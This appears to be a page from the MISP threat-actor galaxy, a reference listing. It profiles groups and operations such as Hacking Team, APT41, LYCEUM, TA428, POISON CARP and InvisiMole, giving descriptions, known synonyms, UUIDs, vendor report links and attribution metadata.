The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.
Internal MISP references
UUID d7f0d2a8-9329-11e9-851e-dbfc1c517e4e
which can be used as unique global reference for Hacking Team
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OurMine
OurMine is known for hijacking celebrity internet accounts, often committing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high-profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.
Internal MISP references
UUID 2c9e1964-9357-11e9-ad8f-5f422851e912
which can be used as unique global reference for OurMine
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hbo-twitter-and-facebook-accounts-hacked-by-ourmine - webarchive
- https://gizmodo.com/welp-vevo-just-got-hacked-1813390834 - webarchive
- https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/ - webarchive
- https://en.wikipedia.org/wiki/OurMine - webarchive
Associated metadata
Metadata key | Value |
---|---|
Pacha Group
Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors of Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third-party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are of Chinese origin. We have labeled the undetected Linux.Antd variants Linux.GreedyAntd and classified the threat actor as Pacha Group.
Internal MISP references
UUID aa469d96-9357-11e9-bd7d-df125c7cba53
which can be used as unique global reference for Pacha Group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Rocke
This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rocke.
Known Synonyms |
---|
Aged Libra |
Internal MISP references
UUID 53583c40-935e-11e9-b4fc-d7e217a306d2
which can be used as unique global reference for Rocke
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html - webarchive
- https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ - webarchive
- https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/agedlibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
[Vault 7/8]
An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. The leaking was done through WikiLeaks, starting in March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until the source's arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, but many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, including Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.
Internal MISP references
UUID 9f133738-935f-11e9-aa5e-bbf8d91abb46
which can be used as unique global reference for [Vault 7/8]
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ZOMBIE SPIDER
On April 7, 2017, Pytor Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.
Internal MISP references
UUID e01b8f3a-9366-11e9-9c6f-17ba128aa4b6
which can be used as unique global reference for ZOMBIE SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/ - webarchive
- https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-dismantle-kelihos-botnet-0 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
ViceLeaker
In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims, and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.
Internal MISP references
UUID f676fcd1-cde9-4d0a-8958-221f2abb56e9
which can be used as unique global reference for ViceLeaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SWEED
Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that's been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we've seen in the past in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs).
Internal MISP references
UUID 64ac8827-89d9-4738-9df3-cd955c628bee
which can be used as unique global reference for SWEED
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA428
Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA428.
Known Synonyms |
---|
BRONZE DUDLEY |
Colourful Panda |
Internal MISP references
UUID 5533d062-18ab-4c70-9472-0eac03f95a1d
which can be used as unique global reference for TA428
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology - webarchive
- https://www.recordedfuture.com/china-linked-ta428-threat-group - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop - webarchive
- https://blog.group-ib.com/task - webarchive
- https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
LYCEUM
Lyceum is an Iranian APT group that has been active since at least 2014. They primarily target Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum is known for using cyber espionage techniques and has been linked to other Iranian threat groups such as APT34. They have developed and deployed malware families like Shark and Milan, and have been observed using DNS tunneling and HTTP for command and control communication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LYCEUM.
Known Synonyms |
---|
COBALT LYCEUM |
Chrono Kitten |
HEXANE |
MYSTICDOME |
Spirlin |
Storm-0133 |
UNC1530 |
siamesekitten |
Internal MISP references
UUID e1b95185-8db6-4f3c-9ffd-1749087d934a
which can be used as unique global reference for LYCEUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-lyceum - webarchive
- https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/ - webarchive
- https://www.clearskysec.com/siamesekitten/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Middle East'] |
cfr-target-category | ['Government', 'Energy', 'High-Tech', 'Telecomms', 'Education', 'Military', 'Defense'] |
cfr-type-of-incident | Espionage |
country | IR |
APT41
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT41.
Known Synonyms |
---|
Amoeba |
BARIUM |
BRONZE ATLAS |
BRONZE EXPORT |
Blackfly |
Brass Typhoon |
Earth Baku |
G0044 |
G0096 |
Grayfly |
HOODOO |
LEAD |
Red Kelpie |
TA415 |
WICKED PANDA |
WICKED SPIDER |
Internal MISP references
UUID 9c124874-042d-48cd-b72b-ccdc51ecbbd6
which can be used as unique global reference for APT41
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/winnti-faq-more-than-just-a-game/57585/ - webarchive
- https://securelist.com/winnti-more-than-just-a-game/37029/ - webarchive
- http://williamshowalter.com/a-universal-windows-bootkit/ - webarchive
- https://www.microsoft.com/security/blog/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ - webarchive
- https://securelist.com/games-are-over/70991/ - webarchive
- https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a - webarchive
- https://www.dw.com/en/thyssenkrupp-victim-of-cyber-attack/a-36695341 - webarchive
- https://www.bleepingcomputer.com/news/security/teamviewer-confirms-undisclosed-breach-from-2016/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/ - webarchive
- https://www.dw.com/en/bayer-points-finger-at-wicked-panda-in-cyberattack/a-48196004 - webarchive
- https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/ - webarchive
- https://401trg.com/burning-umbrella/ - webarchive
- https://attack.mitre.org/groups/G0044/ - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-export - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer - webarchive
- https://assets.documentcloud.org/documents/7210602/FLASH-AC-000133-TT-Published.pdf - webarchive
- https://www.cfr.org/cyber-operations/winnti-umbrella - webarchive
- https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html - webarchive
- https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/ - webarchive
- https://www.mandiant.com/resources/report-apt41-double-dragon-a-dual-espionage-and-cyber-crime-operation - webarchive
- https://www.cfr.org/cyber-operations/apt-41 - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | People's Republic of China |
cfr-suspected-victims | ['China', 'France', 'Hong Kong', 'India', 'Italy', 'Japan', 'Myanmar', 'Netherlands', 'Singapore', 'South Korea', 'South Africa', 'Switzerland', 'Thailand', 'Turkey', 'United Kingdom', 'United States'] |
cfr-target-category | ['Automotive', 'Business', 'Services', 'Cryptocurrency', 'Education', 'Energy', 'Financial', 'Healthcare', 'High-Tech', 'Intergovernmental', 'Media and Entertainment', 'Pharmaceuticals', 'Private sector', 'Retail', 'Telecommunications', 'Travel'] |
country | CN |
Tortoiseshell
A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tortoiseshell.
Known Synonyms |
---|
Crimson Sandstorm |
DUSTYCAVE |
IMPERIAL KITTEN |
Imperial Kitten |
TA456 |
Yellow Liderc |
Internal MISP references
UUID 5f108484-db7f-11e9-aaa4-fb0176425734
which can be used as unique global reference for Tortoiseshell
in MISP communities and other software using the MISP galaxy
External references
- https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain - webarchive
- https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897 - webarchive
- https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-october - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2023/09/25/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/ - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Defense', 'Government', 'Military', 'Finance', 'Energy', 'Healthcare', 'Pharmaceuticals', 'Telecoms', 'High-Tech', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Rail', 'Transportation'] |
cfr-type-of-incident | Espionage |
country | IR |
POISON CARP
Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POISON CARP.
Known Synonyms |
---|
Earth Empusa |
Evil Eye |
Red Dev 16 |
Internal MISP references
UUID 7aa99279-4255-4d26-bb95-12e7156555a0
which can be used as unique global reference for POISON CARP
in MISP communities and other software using the MISP galaxy
External references
- https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ - webarchive
- https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/ - webarchive
- https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
TA410
Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)
Internal MISP references
UUID 5cd95926-0098-435e-892d-9c9f61763ad7
which can be used as unique global reference for TA410
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals - webarchive
- https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
Associated metadata
Metadata key | Value |
---|---|
Operation Soft Cell
In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attack focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.
Internal MISP references
UUID 8dda51ef-9a30-48f7-b0fd-5b6f0a62262d
which can be used as unique global reference for Operation Soft Cell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['operation'] |
Operation WizardOpium
We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.
Internal MISP references
UUID 75db4269-924b-4771-8f62-0de600a43634
which can be used as unique global reference for Operation WizardOpium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['operation'] |
Calypso
The activity of the Calypso group was first detected by specialists at PT Expert Security Center in March 2019, during threat-detection work. As a result, many malware samples of this group were obtained, and the affected organizations and the intruders' control servers were identified. According to our data, the group has been active since at least September 2016. The main goal of the group is to steal confidential data; its main victims are government agencies in Brazil, India, Kazakhstan, Russia, Thailand and Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Calypso.
Known Synonyms |
---|
BRONZE MEDLEY |
Internal MISP references
UUID 200d04c8-a11f-45c4-86fd-35bb5de3f7a3
which can be used as unique global reference for Calypso
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
TA2101
Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt für Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA2101.
Known Synonyms |
---|
DEV-0216 |
GOLD VILLAGE |
Maze Team |
Storm-0216 |
TWISTED SPIDER |
Twisted Spider |
Internal MISP references
UUID 39925aa0-c7bf-4b9b-97d6-7d600329453d
which can be used as unique global reference for TA2101
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://adversary.crowdstrike.com/adversary/twisted-spider/ - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-village - webarchive
- https://www.cysecurity.news/2023/12/twisted-spiders-dangerous-cactus.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
APT-C-34
As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations from all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, and government dissidents alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried out by a threat actor with considerable resources, and one who had the ability to develop their own private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-34.
Known Synonyms |
---|
Golden Falcon |
Internal MISP references
UUID feb0cfef-0472-4108-83d7-1a322d8ab86b
which can be used as unique global reference for APT-C-34
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
luoxk
Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.
Internal MISP references
UUID 69e11692-691e-4bfb-9557-4e2a271684ed
which can be used as unique global reference for luoxk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
since | 2017 |
RAZOR TIGER
An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage exploits for known vulnerabilities (such as CVE-2017-11882) and later deploy a PowerShell payload in the final stages.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RAZOR TIGER.
Known Synonyms |
---|
APT-C-17 |
Rattlesnake |
SideWinder |
T-APT-04 |
Internal MISP references
UUID c4ce1174-9462-47e9-8038-794f40a184b3
which can be used as unique global reference for RAZOR TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/apt-trends-report-q1-2018/85280/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ - webarchive
- https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html - webarchive
- https://s.tencent.com/research/report/659.html - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf - webarchive
- https://s.tencent.com/research/report/479.html - webarchive
- https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c - webarchive
- https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | India |
cfr-suspected-victims | ['China', 'Pakistan', 'Nepal', 'Afghanistan'] |
cfr-target-category | ['Government', 'Military', 'Private Sector'] |
country | IN |
Operation Wocao
Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.
Internal MISP references
UUID c432d032-ce2b-4eb8-ba87-312b2a43fb7a
which can be used as unique global reference for Operation Wocao
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Budminer
Based on the evidence we have presented, Symantec attributed the activity involving the Dripion malware to the Budminer advanced threat group. While we have not seen new campaigns using Taidoor malware since 2014, we believe the Budminer group has changed tactics to avoid detection after being outed publicly in security white papers and blogs over the past few years.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Budminer.
Known Synonyms |
---|
Budminer cyberespionage group |
Internal MISP references
UUID 2eb0dc7a-cef6-4744-92ac-2fe269dacb95
which can be used as unique global reference for Budminer
in MISP communities and other software using the MISP galaxy
External references
- https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan - webarchive
- https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm - webarchive
- https://www.research-collection.ethz.ch/bitstream/handle/20.500.11850/389371/1/Cyber-Reports-2020-01-A-one-sided-Affair.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
suspected-victims | Taiwan |
Attor
Adversary group targeting diplomatic missions and governmental organisations.
Internal MISP references
UUID 947a450a-df6c-4c2e-807b-0da8ecea1d26
which can be used as unique global reference for Attor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
APT-C-12
According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China...[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-12.
Known Synonyms |
---|
Blue Mushroom |
NuclearCrisis |
Sapphire Mushroom |
Internal MISP references
UUID 53771ca5-f1cb-47b6-a92a-53a485307cf7
which can be used as unique global reference for APT-C-12
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector', 'Government', 'Military', 'Scientific Research', 'Finance'] |
cfr-type-of-incident | Espionage |
suspected-victims | China |
InvisiMole
Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.
Internal MISP references
UUID 87af83a4-ced4-4e7c-96a6-86612dc095b1
which can be used as unique global reference for InvisiMole
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
